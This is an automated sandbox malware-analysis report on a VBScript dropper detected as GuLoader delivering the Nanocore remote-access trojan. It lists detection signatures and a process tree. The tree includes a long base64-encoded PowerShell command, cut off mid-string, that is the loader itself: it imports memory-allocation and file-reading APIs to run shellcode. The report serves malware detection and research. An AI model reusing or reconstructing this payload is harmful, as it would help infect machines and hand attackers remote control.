Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IMG 0045434.vbs

Overview

General Information

Sample Name:IMG 0045434.vbs
Analysis ID:562140
MD5:813117cdcd80979365fd6d9586d11e4a
SHA1:e28ef2705053405e87f440f078f31d13b09a9ee3
SHA256:1def093ef16309c10c38b5426ac396019c4ddc074394b022626b8dce1ea2acaa
Infos:

Detection

Nanocore GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Detected Nanocore Rat
Antivirus detection for URL or domain
Yara detected Nanocore RAT
Yara detected GuLoader
Hides threads from debuggers
Creates an autostart registry key pointing to binary in C:\Windows
Creates multiple autostart registry keys
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Potential malicious VBS script found (has network functionality)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Creates autostart registry keys with suspicious values (likely registry only malware)
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses dynamic DNS services
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Drops PE files
Tries to load missing DLLs
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Creates a process in suspended mode (likely to inject code)
Sigma detected: Autorun Keys Modification
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w10x64native
  • wscript.exe (PID: 7064 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\IMG 0045434.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • powershell.exe (PID: 7640 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAGkAYQBzAHUAcwBpACAAcABpAGwAdABzAHQAIABPAG0AcwBvAHIAZwBzAGMAZQAgAFAAcgBlAGwANgAgAGIAYQByAHMAawBhAGIAZQBzAG4AIABNAGUAdABhAHQAaABlACAAVABlAGwAZQB2AHMAbgBlAHQAcwA2ACAAUwBtAGEAbABzADcAIABCAE8ATwBTAFQARQBSAEkAIABtAGkAcwBtACAAUABJAE4AUwAgAFQAbgBkAGUAaAB2AGwAMQAgAHMAawByAGkAdgAgAE8AdgBlAHIAIAB1AG4AcAByAG8AcABhAGcAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEgAaQBsAGQAMwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBQAGkAZQByAGkAZAAiACAADQAKACQAUwBsAHUAZAByAGUAYwBoADMAPQAwADsADQAKACQAUwBsAHUAZAByAGUAYwBoADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAUwBsAHUAZAByAGUAYwBoADgAPQBbAFMAbAB1AGQAcgBlAGMAaAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAbAB1AGQAcgBlAGMAaAAzACwAMAAsAFsAcgBlAGYAXQAkAFMAbAB1AGQAcgBlAGMAaAA5ACwAMQAyADIAOAA4ACwANgA0ACkADQAKACMAcwBvAGcAbgBlACAAcwBhAG4AZwAgAE4AWQBUAFYAQQBOAEMAIABSAGkAbABsAGUAdABwAHIAbwA4ACAAcABvAHAAdQBsAGEAcgAgAGIAaQBsAGwAZQBkAG0AIABsAHMAZQBwAHIAbwBjACAAYwBvAG4AcwB0AGEAbgAgAFMAdQBiAHQAZQAgAEkAbABzAGEAYgBlAHQAOQAgAGgAdQBsAGsAeQBuAGEAcAAgAGIAZQB2AHIAdABlAHIAZQBuACAAUwBpAGQAZQB2AGkAIABNAGEAcwB0ACAARQBuAHMAbwBtADEAIABVAG4AZABlAHIAcwBjAGEAbABlADEAIABUAHIAeQBrAGsAZQByAGkAbAAgAEkAZABvAGwAaQBzAGUAcgBpADEAIAByAGUAZAB1ACAAdQBuAGQAdgBpAGcAZQBtAGEAbgAgAEQAZQBmAGUAIABLAE4ATwBDAEsATwBVACAAUwBsAHYAZQBzAHQAZQBzACAATgBv